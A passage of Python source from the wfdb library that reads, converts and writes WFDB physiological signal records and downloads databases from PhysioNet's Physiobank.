\"\"\"\n\n # Fixed layout. All channels are the same.\n if self.layout == 'fixed':\n required_channels = [channels] * len(seg_numbers)\n # Variable layout: figure out channels by matching record names\n else:\n required_channels = []\n # The overall layout signal names\n l_sig_names = self.segments[0].sig_name\n # The wanted signals\n w_sig_names = [l_sig_names[c] for c in channels]\n\n # For each segment\n for i in range(len(seg_numbers)):\n # Skip empty segments\n if self.seg_name[seg_numbers[i]] == '~':\n required_channels.append([])\n else:\n # Get the signal names of the current segment\n s_sig_names = rdheader(\n os.path.join(dir_name, self.seg_name[seg_numbers[i]]),\n pb_dir=pb_dir).sig_name\n required_channels.append(_get_wanted_channels(\n w_sig_names, s_sig_names))\n\n return required_channels\n\n def _arrange_fields(self, seg_numbers, seg_ranges, channels,\n sampfrom=0, force_channels=True):\n \"\"\"\n Arrange/edit object fields to reflect user channel and/or\n signal range inputs. Updates layout specification header if\n necessary.\n\n Parameters\n ----------\n seg_numbers : list\n List of integer segment numbers read.\n seg_ranges: list\n List of integer pairs, giving the sample ranges for each\n segment number read.\n channels : list\n List of channel numbers specified\n sampfrom : int\n Starting sample read.\n force_channels : bool, optional\n Used when reading multi-segment variable layout records.\n Whether to update the layout specification record to match\n the input `channels` argument, or to omit channels in which\n no read segment contains the signals.\n\n \"\"\"\n # Update seg_len values for relevant segments\n for i in range(len(seg_numbers)):\n self.seg_len[seg_numbers[i]] = seg_ranges[i][1] - seg_ranges[i][0]\n\n # Get rid of the segments and segment line parameters\n # outside the desired segment range\n if self.layout == 'fixed':\n self.n_sig = len(channels)\n self.segments = self.segments[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_name = self.seg_name[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_len = self.seg_len[seg_numbers[0]:seg_numbers[-1]+1]\n else:\n self.segments = [self.segments[0]] + self.segments[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_name = [self.seg_name[0]] + self.seg_name[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_len = [self.seg_len[0]] + self.seg_len[seg_numbers[0]:seg_numbers[-1]+1]\n\n # Update the layout specification segment. At this point it\n # should match the full original header\n\n # Have to inspect existing channels of segments; requested\n # input channels will not be enough on its own because not\n # all signals may be present, depending on which section of\n # the signal was read.\n if not force_channels:\n # The desired signal names.\n desired_sig_names = [self.segments[0].sig_name[ch] for ch in channels]\n # Actual contained signal names of individual segments\n #contained_sig_names = [seg.sig_name for seg in self.segments[1:]]\n contained_sig_names = set([name for seg in self.segments[1:] if seg is not None for name in seg.sig_name])\n # Remove non-present names. Keep the order.\n sig_name = [name for name in desired_sig_names if name in contained_sig_names]\n # Channel indices to keep for signal specification fields\n channels = [self.segments[0].sig_name.index(name) for name in sig_name]\n\n # Rearrange signal specification fields\n for field in _header.SIGNAL_SPECS.index:\n item = getattr(self.segments[0], field)\n setattr(self.segments[0], field, [item[c] for c in channels])\n\n self.segments[0].n_sig = self.n_sig = len(channels)\n if self.n_sig == 0:\n print('No signals of the desired channels are contained in the specified sample range.')\n\n # Update record specification parameters\n self.sig_len = sum([sr[1]-sr[0] for sr in seg_ranges])\n self.n_seg = len(self.segments)\n self._adjust_datetime(sampfrom=sampfrom)\n\n\n def multi_to_single(self, physical, return_res=64):\n \"\"\"\n Create a Record object from the MultiRecord object. All signal\n segments will be combined into the new object's `p_signal` or\n `d_signal` field. For digital format, the signals must have\n the same storage format, baseline, and adc_gain in all segments.\n\n Parameters\n ----------\n physical : bool\n Whether to convert the physical or digital signal.\n return_res : int, optional\n The return resolution of the `p_signal` field. Options are:\n 64, 32, and 16.\n\n Returns\n -------\n record : wfdb Record\n The single segment record created.\n\n \"\"\"\n\n # The fields to transfer to the new object\n fields = self.__dict__.copy()\n\n # Remove multirecord fields\n for attr in ['segments', 'seg_name', 'seg_len', 'n_seg']:\n del(fields[attr])\n\n # Figure out single segment fields to set for the new Record\n if self.layout == 'fixed':\n # Get the fields from the first segment\n for attr in ['fmt', 'adc_gain', 'baseline', 'units', 'sig_name']:\n fields[attr] = getattr(self.segments[0], attr)\n else:\n # For variable layout records, inspect the segments for the\n # attribute values.\n\n # Coincidentally, if physical=False, figure out if this\n # conversion can be performed. All signals of the same name\n # must have the same fmt, gain, baseline, and units for all\n # segments.\n\n # The layout header should be updated at this point to\n # reflect channels. We can depend on it for sig_name, but\n # not for fmt, adc_gain, units, and baseline.\n\n # These signal names will be the key\n signal_names = self.segments[0].sig_name\n n_sig = len(signal_names)\n\n # This will be the field dictionary to copy over.\n reference_fields = {'fmt':n_sig*[None], 'adc_gain':n_sig*[None],\n 'baseline':n_sig*[None],\n 'units':n_sig*[None]}\n\n # For physical signals, mismatched fields will not be copied\n # over. For digital, mismatches will cause an exception.\n mismatched_fields = []\n for seg in self.segments[1:]:\n if seg is None:\n continue\n # For each signal, check fmt, adc_gain, baseline, and\n # units of each signal\n for seg_ch in range(seg.n_sig):\n sig_name = seg.sig_name[seg_ch]\n # The overall channel\n ch = signal_names.index(sig_name)\n\n for field in reference_fields:\n item_ch = getattr(seg, field)[seg_ch]\n if reference_fields[field][ch] is None:\n reference_fields[field][ch] = item_ch\n # mismatch case\n elif reference_fields[field][ch] != item_ch:\n if physical:\n mismatched_fields.append(field)\n else:\n raise Exception('This variable layout multi-segment record cannot be converted to single segment, in digital format.')\n # Remove mismatched signal fields for physical signals\n for field in set(mismatched_fields):\n del(reference_fields[field])\n # At this point, the fields should be set for all channels\n fields.update(reference_fields)\n fields['sig_name'] = signal_names\n\n # Figure out signal attribute to set, and its dtype.\n if physical:\n sig_attr = 'p_signal'\n # Figure out the largest required dtype\n dtype = _signal._np_dtype(return_res, discrete=False)\n nan_vals = np.array([self.n_sig * [np.nan]], dtype=dtype)\n else:\n sig_attr = 'd_signal'\n # Figure out the largest required dtype\n dtype = _signal._np_dtype(return_res, discrete=True)\n nan_vals = np.array([_signal._digi_nan(fields['fmt'])], dtype=dtype)\n\n # Initialize the full signal array\n combined_signal = np.repeat(nan_vals, self.sig_len, axis=0)\n\n # Start and end samples in the overall array to place the\n # segment samples into\n start_samps = [0] + list(np.cumsum(self.seg_len)[0:-1])\n end_samps = list(np.cumsum(self.seg_len))\n\n if self.layout == 'fixed':\n # Copy over the signals directly. Recall there are no\n # empty segments in fixed layout records.\n for i in range(self.n_seg):\n combined_signal[start_samps[i]:end_samps[i], :] = getattr(self.segments[i], sig_attr)\n else:\n # Copy over the signals into the matching channels\n for i in range(1, self.n_seg):\n seg = self.segments[i]\n if seg is not None:\n # Get the segment channels to copy over for each\n # overall channel\n segment_channels = _get_wanted_channels(fields['sig_name'],\n seg.sig_name,\n pad=True)\n for ch in range(self.n_sig):\n # Copy over relevant signal\n if segment_channels[ch] is not None:\n combined_signal[start_samps[i]:end_samps[i], ch] = getattr(seg, sig_attr)[:, segment_channels[ch]]\n\n # Create the single segment Record object and set attributes\n record = Record()\n for field in fields:\n setattr(record, field, fields[field])\n setattr(record, sig_attr, combined_signal)\n\n # Use the signal to set record features\n if physical:\n record.set_p_features()\n else:\n record.set_d_features()\n\n return record\n\n\n# ---------------------- Type Specifications ------------------------- #\n\n\n# Allowed types of wfdb header fields, and also attributes defined in\n# this library\nALLOWED_TYPES = dict([[index, _header.FIELD_SPECS.loc[index, 'allowed_types']] for index in _header.FIELD_SPECS.index])\nALLOWED_TYPES.update({'comments': (str,), 'p_signal': (np.ndarray,),\n 'd_signal':(np.ndarray,), 'e_p_signal':(np.ndarray,),\n 'e_d_signal':(np.ndarray,),\n 'segments':(Record, type(None))})\n\n# Fields that must be lists\nLIST_FIELDS = tuple(_header.SIGNAL_SPECS.index) + ('comments', 'e_p_signal',\n 'e_d_signal', 'segments')\n\n\ndef _check_item_type(item, field_name, allowed_types, expect_list=False,\n required_channels='all'):\n \"\"\"\n Check the item's type against a set of allowed types.\n Vary the print message regarding whether the item can be None.\n Helper to `BaseRecord.check_field`.\n\n Parameters\n ----------\n item : any\n The item to check.\n field_name : str\n The field name.\n allowed_types : iterable\n Iterable of types the item is allowed to be.\n expect_list : bool, optional\n Whether the item is expected to be a list.\n required_channels : list, optional\n List of integers specifying which channels of the item must be\n present. May be set to 'all' to indicate all channels. Only used\n if `expect_list` is True, ie. item is a list, and its\n subelements are to be checked.\n\n Notes\n -----\n This is called by `check_field`, which determines whether the item\n should be a list or not. This function should generally not be\n called by the user directly.\n\n \"\"\"\n if expect_list:\n if not isinstance(item, list):\n raise TypeError('Field `%s` must be a list.' % field_name)\n\n # All channels of the field must be present.\n if required_channels == 'all':\n required_channels = list(range(len(item)))\n\n for ch in range(len(item)):\n # Check whether the field may be None\n if ch in required_channels:\n allowed_types_ch = allowed_types\n else:\n allowed_types_ch = allowed_types + (type(None),)\n\n if not isinstance(item[ch], allowed_types_ch):\n raise TypeError('Channel %d of field `%s` must be one of the following types:' % (ch, field_name),\n allowed_types_ch)\n else:\n if not isinstance(item, allowed_types):\n raise TypeError('Field `%s` must be one of the following types:',\n allowed_types)\n\n\ndef check_np_array(item, field_name, ndim, parent_class, channel_num=None):\n \"\"\"\n Check a numpy array's shape and dtype against required\n specifications.\n\n Parameters\n ----------\n item : numpy array\n The numpy array to check\n field_name : str\n The name of the field to check\n ndim : int\n The required number of dimensions\n parent_class : type\n The parent class of the dtype. ie. np.integer, np.floating.\n channel_num : int, optional\n If not None, indicates that the item passed in is a subelement\n of a list. Indicate this in the error message if triggered.\n\n \"\"\"\n # Check shape\n if item.ndim != ndim:\n error_msg = 'Field `%s` must have ndim == %d' % (field_name, ndim)\n if channel_num is not None:\n error_msg = ('Channel %d of f' % channel_num) + error_msg[1:]\n raise TypeError(error_msg)\n\n # Check dtype\n if not np.issubdtype(item.dtype, parent_class):\n error_msg = 'Field `%s` must have a dtype that subclasses %s' % (field_name, parent_class)\n if channel_num is not None:\n error_msg = ('Channel %d of f' % channel_num) + error_msg[1:]\n raise TypeError(error_msg)\n\n\n#------------------------- Reading Records --------------------------- #\n\n\ndef rdheader(record_name, pb_dir=None, rd_segments=False):\n \"\"\"\n Read a WFDB header file and return a `Record` or `MultiRecord`\n object with the record descriptors as attributes.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read, without any file\n extensions. If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/BASE_RECORD.\n Both relative and absolute paths are accepted. If the `pb_dir`\n parameter is set, this parameter should contain just the base\n record name, and the files fill be searched for remotely.\n Otherwise, the data files will be searched for in the local path.\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n rd_segments : bool, optional\n Used when reading multi-segment headers. If True, segment headers will\n also be read (into the record object's `segments` field).\n\n Returns\n -------\n record : Record or MultiRecord\n The wfdb Record or MultiRecord object representing the contents\n of the header read.\n\n Examples\n --------\n >>> ecg_record = wfdb.rdheader('sample-data/test01_00s', sampfrom=800,\n channels = [1,3])\n\n \"\"\"\n dir_name, base_record_name = os.path.split(record_name)\n dir_name = os.path.abspath(dir_name)\n\n # Read the header file. Separate comment and non-comment lines\n header_lines, comment_lines = _header._read_header_lines(base_record_name,\n dir_name, pb_dir)\n\n # Get fields from record line\n record_fields = _header._parse_record_line(header_lines[0])\n\n # Single segment header - Process signal specification lines\n if record_fields['n_seg'] is None:\n # Create a single-segment WFDB record object\n record = Record()\n\n # There are signals\n if len(header_lines)>1:\n # Read the fields from the signal lines\n signal_fields = _header._parse_signal_lines(header_lines[1:])\n # Set the object's signal fields\n for field in signal_fields:\n setattr(record, field, signal_fields[field])\n\n # Set the object's record line fields\n for field in record_fields:\n if field == 'n_seg':\n continue\n setattr(record, field, record_fields[field])\n # Multi segment header - Process segment specification lines\n else:\n # Create a multi-segment WFDB record object\n record = MultiRecord()\n # Read the fields from the segment lines\n segment_fields = _header._read_segment_lines(header_lines[1:])\n # Set the object's segment fields\n for field in segment_fields:\n setattr(record, field, segment_fields[field])\n # Set the objects' record fields\n for field in record_fields:\n setattr(record, field, record_fields[field])\n\n # Determine whether the record is fixed or variable\n if record.seg_len[0] == 0:\n record.layout = 'variable'\n else:\n record.layout = 'fixed'\n\n # If specified, read the segment headers\n if rd_segments:\n record.segments = []\n # Get the base record name (could be empty)\n for s in record.seg_name:\n if s == '~':\n record.segments.append(None)\n else:\n record.segments.append(rdheader(os.path.join(dir_name, s),\n pb_dir))\n # Fill in the sig_name attribute\n record.sig_name = record.get_sig_name()\n # Fill in the sig_segments attribute\n record.sig_segments = record.get_sig_segments()\n\n # Set the comments field\n record.comments = [line.strip(' \\t#') for line in comment_lines]\n\n return record\n\n\ndef rdrecord(record_name, sampfrom=0, sampto=None, channels=None,\n physical=True, pb_dir=None, m2s=True, smooth_frames=True,\n ignore_skew=False, return_res=64, force_channels=True,\n channel_names=None, warn_empty=False):\n \"\"\"\n Read a WFDB record and return the signal and record descriptors as\n attributes in a Record or MultiRecord object.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read, without any file\n extensions. If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/BASE_RECORD.\n Both relative and absolute paths are accepted. If the `pb_dir`\n parameter is set, this parameter should contain just the base\n record name, and the files fill be searched for remotely.\n Otherwise, the data files will be searched for in the local path.\n sampfrom : int, optional\n The starting sample number to read for all channels.\n sampto : int, or 'end', optional\n The sample number at which to stop reading for all channels.\n Reads the entire duration by default.\n channels : list, optional\n List of integer indices specifying the channels to be read.\n Reads all channels by default.\n physical : bool, optional\n Specifies whether to return signals in physical units in the\n `p_signal` field (True), or digital units in the `d_signal`\n field (False).\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n m2s : bool, optional\n Used when reading multi-segment records. Specifies whether to\n directly return a wfdb MultiRecord object (False), or to convert\n it into and return a wfdb Record object (True).\n smooth_frames : bool, optional\n Used when reading records with signals having multiple samples\n per frame. Specifies whether to smooth the samples in signals\n with more than one sample per frame and return an (MxN) uniform\n numpy array as the `d_signal` or `p_signal` field (True), or to\n return a list of 1d numpy arrays containing every expanded\n sample as the `e_d_signal` or `e_p_signal` field (False).\n ignore_skew : bool, optional\n Used when reading records with at least one skewed signal.\n Specifies whether to apply the skew to align the signals in the\n output variable (False), or to ignore the skew field and load in\n all values contained in the dat files unaligned (True).\n return_res : int, optional\n The numpy array dtype of the returned signals. Options are: 64,\n 32, 16, and 8, where the value represents the numpy int or float\n dtype. Note that the value cannot be 8 when physical is True\n since there is no float8 format.\n force_channels : bool, optional\n Used when reading multi-segment variable layout records. Whether\n to update the layout specification record, and the converted\n Record object if `m2s` is True, to match the input `channels`\n argument, or to omit channels in which no read segment contains\n the signals.\n channel_names : list, optional\n List of channel names to return. If this parameter is specified,\n it takes precedence over `channels`.\n warn_empty : bool, optional\n Whether to display a warning if the specified channel indices\n or names are not contained in the record, and no signal is\n returned.\n\n Returns\n -------\n record : Record or MultiRecord\n The wfdb Record or MultiRecord object representing the contents\n of the record read.\n\n Notes\n -----\n If a signal range or channel selection is specified when calling\n this function, the resulting attributes of the returned object will\n be set to reflect the section of the record that is actually read,\n rather than necessarily the entire record. For example, if\n `channels=[0, 1, 2]` is specified when reading a 12 channel record,\n the 'n_sig' attribute will be 3, not 12.\n\n The `rdsamp` function exists as a simple alternative to `rdrecord`\n for the common purpose of extracting the physical signals and a few\n important descriptor fields.\n\n Examples\n --------\n >>> record = wfdb.rdrecord('sample-data/test01_00s', sampfrom=800,\n channels=[1, 3])\n\n \"\"\"\n\n dir_name, base_record_name = os.path.split(record_name)\n dir_name = os.path.abspath(dir_name)\n\n # Read the header fields\n record = rdheader(record_name, pb_dir=pb_dir, rd_segments=False)\n\n # Set defaults for sampto and channels input variables\n if sampto is None:\n # If the header does not contain the signal length, figure it\n # out from the first dat file. This is only possible for single\n # segment records. If there are no signals, sig_len is 0.\n if record.sig_len is None:\n if record.n_sig == 0:\n record.sig_len = 0\n else:\n record.sig_len = _signal._infer_sig_len(\n file_name=record.file_name[0], fmt=record.fmt[0],\n n_sig=record.file_name.count(record.file_name[0]),\n dir_name=dir_name, pb_dir=pb_dir)\n sampto = record.sig_len\n\n # channel_names takes precedence over channels\n if channel_names is not None:\n # Figure out the channel indices matching the record, if any.\n if isinstance(record, Record):\n reference_record = record\n else:\n if record.layout == 'fixed':\n # Find the first non-empty segment to get the signal\n # names\n first_seg_name = [n for n in record.seg_name if n != '~'][0]\n reference_record = rdheader(os.path.join(dir_name,\n record.seg_name[0]),\n pb_dir=pb_dir)\n else:\n # Use the layout specification header to get the signal\n # names\n reference_record = rdheader(os.path.join(dir_name,\n record.seg_name[0]),\n pb_dir=pb_dir)\n\n channels = _get_wanted_channels(wanted_sig_names=channel_names,\n record_sig_names=reference_record.sig_name)\n\n elif channels is None:\n channels = list(range(record.n_sig))\n\n # Ensure that input fields are valid for the record\n record.check_read_inputs(sampfrom, sampto, channels, physical,\n smooth_frames, return_res)\n\n # If the signal doesn't have the specified channels, there will be\n # no signal. Recall that `rdsamp` is not called on segments of multi\n # segment records if the channels are not present, so this won't\n # break anything.\n if not len(channels):\n old_record = record\n record = Record()\n for attr in _header.RECORD_SPECS.index:\n if attr == 'n_seg':\n continue\n elif attr in ['n_sig', 'sig_len']:\n setattr(record, attr, 0)\n else:\n setattr(record, attr, getattr(old_record, attr))\n if warn_empty:\n print('None of the specified signals were contained in the record')\n\n # A single segment record\n elif isinstance(record, Record):\n\n # Only 1 sample/frame, or frames are smoothed. Return uniform numpy array\n if smooth_frames or max([record.samps_per_frame[c] for c in channels]) == 1:\n # Read signals from the associated dat files that contain\n # wanted channels\n record.d_signal = _signal._rd_segment(record.file_name, dir_name,\n pb_dir, record.fmt,\n record.n_sig, record.sig_len,\n record.byte_offset,\n record.samps_per_frame,\n record.skew, sampfrom, sampto,\n channels, smooth_frames,\n ignore_skew)\n\n # Arrange/edit the object fields to reflect user channel\n # and/or signal range input\n record._arrange_fields(channels=channels, sampfrom=sampfrom,\n expanded=False)\n\n if physical:\n # Perform inplace dac to get physical signal\n record.dac(expanded=False, return_res=return_res, inplace=True)\n\n # Return each sample of the signals with multiple samples per frame\n else:\n record.e_d_signal = _signal._rd_segment(record.file_name, dir_name,\n pb_dir, record.fmt,\n record.n_sig,\n record.sig_len,\n record.byte_offset,\n record.samps_per_frame,\n record.skew, sampfrom,\n sampto, channels,\n smooth_frames, ignore_skew)\n\n # Arrange/edit the object fields to reflect user channel\n # and/or signal range input\n record._arrange_fields(channels=channels, sampfrom=sampfrom,\n expanded=True)\n\n if physical:\n # Perform dac to get physical signal\n record.dac(expanded=True, return_res=return_res, inplace=True)\n\n # A multi segment record\n else:\n # Strategy:\n # 1. Read the required segments and store them in\n # Record objects.\n # 2. Update the parameters of the objects to reflect\n # the state of the sections read.\n # 3. Update the parameters of the overall MultiRecord\n # object to reflect the state of the individual segments.\n # 4. If specified, convert the MultiRecord object\n # into a single Record object.\n\n # Segments field is a list of Record objects\n # Empty segments store None.\n\n record.segments = [None] * record.n_seg\n\n # Variable layout, read the layout specification header\n if record.layout == 'variable':\n record.segments[0] = rdheader(os.path.join(dir_name,\n record.seg_name[0]),\n pb_dir=pb_dir)\n\n # The segment numbers and samples within each segment to read.\n seg_numbers, seg_ranges = record._required_segments(sampfrom, sampto)\n # The channels within each segment to read\n seg_channels = record._required_channels(seg_numbers, channels,\n dir_name, pb_dir)\n\n # Read the desired samples in the relevant segments\n for i in range(len(seg_numbers)):\n seg_num = seg_numbers[i]\n # Empty segment or segment with no relevant channels\n if record.seg_name[seg_num] == '~' or len(seg_channels[i]) == 0:\n record.segments[seg_num] = None\n else:\n record.segments[seg_num] = rdrecord(\n os.path.join(dir_name, record.seg_name[seg_num]),\n sampfrom=seg_ranges[i][0], sampto=seg_ranges[i][1],\n channels=seg_channels[i], physical=physical, pb_dir=pb_dir)\n\n # Arrange the fields of the layout specification segment, and\n # the overall object, to reflect user input.\n record._arrange_fields(seg_numbers=seg_numbers, seg_ranges=seg_ranges,\n channels=channels, sampfrom=sampfrom,\n force_channels=force_channels)\n\n # Convert object into a single segment Record object\n if m2s:\n record = record.multi_to_single(physical=physical,\n return_res=return_res)\n\n # Perform dtype conversion if necessary\n if isinstance(record, Record) and record.n_sig > 0:\n record.convert_dtype(physical, return_res, smooth_frames)\n\n return record\n\n\ndef rdsamp(record_name, sampfrom=0, sampto=None, channels=None, pb_dir=None,\n channel_names=None, warn_empty=False):\n \"\"\"\n Read a WFDB record, and return the physical signals and a few important\n descriptor fields.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read (without any file\n extensions). If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/baserecord\n and the data files will be searched for in the local path.\n sampfrom : int, optional\n The starting sample number to read for all channels.\n sampto : int, or 'end', optional\n The sample number at which to stop reading for all channels.\n Reads the entire duration by default.\n channels : list, optional\n List of integer indices specifying the channels to be read.\n Reads all channels by default.\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n channel_names : list, optional\n List of channel names to return. If this parameter is specified,\n it takes precedence over `channels`.\n warn_empty : bool, optional\n Whether to display a warning if the specified channel indices\n or names are not contained in the record, and no signal is\n returned.\n\n Returns\n -------\n signals : numpy array\n A 2d numpy array storing the physical signals from the record.\n fields : dict\n A dictionary containing several key attributes of the read\n record:\n - fs: The sampling frequency of the record\n - units: The units for each channel\n - sig_name: The signal name for each channel\n - comments: Any comments written in the header\n\n Notes\n -----\n If a signal range or channel selection is specified when calling\n this function, the resulting attributes of the returned object will\n be set to reflect the section of the record that is actually read,\n rather than necessarily the entire record. For example, if\n `channels=[0, 1, 2]` is specified when reading a 12 channel record,\n the 'n_sig' attribute will be 3, not 12.\n\n The `rdrecord` function is the base function upon which this one is\n built. It returns all attributes present, along with the signals, as\n attributes in a `Record` object. The function, along with the\n returned data type, has more options than `rdsamp` for users who\n wish to more directly manipulate WFDB content.\n\n Examples\n --------\n >>> signals, fields = wfdb.rdsamp('sample-data/test01_00s',\n sampfrom=800,\n channel =[1,3])\n\n \"\"\"\n record = rdrecord(record_name=record_name, sampfrom=sampfrom,\n sampto=sampto, channels=channels, physical=True,\n pb_dir=pb_dir, m2s=True, channel_names=channel_names,\n warn_empty=warn_empty)\n\n signals = record.p_signal\n fields = {}\n for field in ['fs','sig_len', 'n_sig', 'base_date', 'base_time',\n 'units','sig_name', 'comments']:\n fields[field] = getattr(record, field)\n\n return signals, fields\n\n\ndef _get_wanted_channels(wanted_sig_names, record_sig_names, pad=False):\n \"\"\"\n Given some wanted signal names, and the signal names contained in a\n record, return the indices of the record channels that intersect.\n\n Parameters\n ----------\n wanted_sig_names : list\n List of desired signal name strings\n record_sig_names : list\n List of signal names for a single record\n pad : bool, optional\n Whether the output channels is to always have the same number\n of elements and the wanted channels. If True, pads missing\n signals with None.\n\n Returns\n -------\n wanted_channel_inds\n\n \"\"\"\n if pad:\n return [record_sig_names.index(s) if s in record_sig_names else None for s in wanted_sig_names]\n else:\n return [record_sig_names.index(s) for s in wanted_sig_names if s in record_sig_names]\n\n\n#------------------- /Reading Records -------------------#\n\n\ndef wrsamp(record_name, fs, units, sig_name, p_signal=None, d_signal=None,\n fmt=None, adc_gain=None, baseline=None, comments=None,\n base_time=None, base_date=None, write_dir=''):\n \"\"\"\n Write a single segment WFDB record, creating a WFDB header file and any\n associated dat files.\n\n Parameters\n ----------\n record_name : str\n The string name of the WFDB record to be written (without any file\n extensions).\n fs : int, or float\n The sampling frequency of the record.\n units : list\n A list of strings giving the units of each signal channel.\n sig_name :\n A list of strings giving the signal name of each signal channel.\n p_signal : numpy array, optional\n An (MxN) 2d numpy array, where M is the signal length. Gives the\n physical signal values intended to be written. Either p_signal or\n d_signal must be set, but not both. If p_signal is set, this method will\n use it to perform analogue-digital conversion, writing the resultant\n digital values to the dat file(s). If fmt is set, gain and baseline must\n be set or unset together. If fmt is unset, gain and baseline must both\n be unset.\n d_signal : numpy array, optional\n An (MxN) 2d numpy array, where M is the signal length. Gives the\n digital signal values intended to be directly written to the dat\n file(s). The dtype must be an integer type. Either p_signal or d_signal\n must be set, but not both. In addition, if d_signal is set, fmt, gain\n and baseline must also all be set.\n fmt : list, optional\n A list of strings giving the WFDB format of each file used to store each\n channel. Accepted formats are: '80','212\",'16','24', and '32'. There are\n other WFDB formats as specified by:\n https://www.physionet.org/physiotools/wag/signal-5.htm\n but this library will not write (though it will read) those file types.\n adc_gain : list, optional\n A list of numbers specifying the ADC gain.\n baseline : list, optional\n A list of integers specifying the digital baseline.\n comments : list, optional\n A list of string comments to be written to the header file.\n base_time : str, optional\n A string of the record's start time in 24h 'HH:MM:SS(.ms)' format.\n base_date : str, optional\n A string of the record's start date in 'DD/MM/YYYY' format.\n write_dir : str, optional\n The directory in which to write the files.\n\n Notes\n -----\n This is a gateway function, written as a simple method to write WFDB record\n files using the most common parameters. Therefore not all WFDB fields can be\n set via this function.\n\n For more control over attributes, create a `Record` object, manually set its\n attributes, and call its `wrsamp` instance method. If you choose this more\n advanced method, see also the `set_defaults`, `set_d_features`, and\n `set_p_features` instance methods to help populate attributes.\n\n Examples\n --------\n >>> # Read part of a record from Physiobank\n >>> signals, fields = wfdb.rdsamp('a103l', sampfrom=50000, channels=[0,1],\n pb_dir='challenge/2015/training')\n >>> # Write a local WFDB record (manually inserting fields)\n >>> wfdb.wrsamp('ecgrecord', fs = 250, units=['mV', 'mV'],\n sig_name=['I', 'II'], p_signal=signals, fmt=['16', '16'])\n\n \"\"\"\n\n # Check input field combinations\n if p_signal is not None and d_signal is not None:\n raise Exception('Must only give one of the inputs: p_signal or d_signal')\n if d_signal is not None:\n if fmt is None or adc_gain is None or baseline is None:\n raise Exception(\"When using d_signal, must also specify 'fmt', 'gain', and 'baseline' fields.\")\n # Depending on whether d_signal or p_signal was used, set other\n # required features.\n if p_signal is not None:\n # Create the Record object\n record = Record(record_name=record_name, p_signal=p_signal, fs=fs,\n fmt=fmt, units=units, sig_name=sig_name,\n adc_gain=adc_gain, baseline=baseline,\n comments=comments, base_time=base_time,\n base_date=base_date)\n # Compute optimal fields to store the digital signal, carry out adc,\n # and set the fields.\n record.set_d_features(do_adc=1)\n else:\n # Create the Record object\n record = Record(record_name=record_name, d_signal=d_signal, fs=fs,\n fmt=fmt, units=units, sig_name=sig_name,\n adc_gain=adc_gain, baseline=baseline,\n comments=comments, base_time=base_time,\n base_date=base_date)\n # Use d_signal to set the fields directly\n record.set_d_features()\n\n # Set default values of any missing field dependencies\n record.set_defaults()\n # Write the record files - header and associated dat\n record.wrsamp(write_dir=write_dir)\n\n\ndef is_monotonic(full_list):\n \"\"\"\n Determine whether elements in a list are monotonic. ie. unique\n elements are clustered together.\n\n ie. [5,5,3,4] is, [5,3,5] is not.\n \"\"\"\n prev_elements = set({full_list[0]})\n prev_item = full_list[0]\n\n for item in full_list:\n if item != prev_item:\n if item in prev_elements:\n return False\n prev_item = item\n prev_elements.add(item)\n\n return True\n\ndef dl_database(db_dir, dl_dir, records='all', annotators='all',\n keep_subdirs=True, overwrite=False):\n \"\"\"\n Download WFDB record (and optionally annotation) files from a\n Physiobank database. The database must contain a 'RECORDS' file in\n its base directory which lists its WFDB records.\n\n Parameters\n ----------\n db_dir : str\n The Physiobank database directory to download. eg. For database:\n 'http://physionet.org/physiobank/database/mitdb', db_dir='mitdb'.\n dl_dir : str\n The full local directory path in which to download the files.\n records : list, or 'all', optional\n A list of strings specifying the WFDB records to download. Leave\n as 'all' to download all records listed in the database's\n RECORDS file.\n eg. records=['test01_00s', test02_45s] for database:\n https://physionet.org/physiobank/database/macecgdb/\n annotators : list, 'all', or None, optional\n A list of strings specifying the WFDB annotation file types to\n download along with the record files. Is either None to skip\n downloading any annotations, 'all' to download all annotation\n types as specified by the ANNOTATORS file, or a list of strings\n which each specify an annotation extension.\n eg. annotators = ['anI'] for database:\n https://physionet.org/physiobank/database/prcp/\n keep_subdirs : bool, optional\n Whether to keep the relative subdirectories of downloaded files\n as they are organized in Physiobank (True), or to download all\n files into the same base directory (False).\n overwrite : bool, optional\n If True, all files will be redownloaded regardless. If False,\n existing files with the same name and relative subdirectory will\n be checked. If the local file is the same size as the online\n file, the download is skipped. If the local file is larger, it\n will be deleted and the file will be redownloaded. If the local\n file is smaller, the file will be assumed to be partially\n downloaded and the remaining bytes will be downloaded and\n appended.\n\n Examples\n --------\n >>> wfdb.dl_database('ahadb', os.getcwd())\n\n \"\"\"\n # Full url physiobank database\n db_url = posixpath.join(download.config.db_index_url, db_dir)\n # Check if the database is valid\n r = requests.get(db_url)\n r.raise_for_status()\n\n # Get the list of records\n recordlist = download.get_record_list(db_dir, records)\n # Get the annotator extensions\n annotators = download.get_annotators(db_dir, annotators)\n\n # All files to download (relative to the database's home directory)\n allfiles = []\n\n for rec in recordlist:\n # Check out whether each record is in MIT or EDF format\n if rec.endswith('.edf'):\n allfiles.append(rec)\n else:\n # May be pointing to directory\n if rec.endswith('/'):\n rec = rec + rec[:-1]\n # If MIT format, have to figure out all associated files\n allfiles.append(rec+'.hea')\n dir_name, baserecname = os.path.split(rec)\n record = rdheader(baserecname, pb_dir=posixpath.join(db_dir, dir_name))\n\n # Single segment record\n if isinstance(record, Record):\n # Add all dat files of the segment\n for file in (record.file_name if record.file_name else []):\n allfiles.append(posixpath.join(dir_name, file))\n\n # Multi segment record\n else:\n for seg in record.seg_name:\n # Skip empty segments\n if seg == '~':\n continue\n # Add the header\n allfiles.append(posixpath.join(dir_name, seg+'.hea'))\n # Layout specifier has no dat files\n if 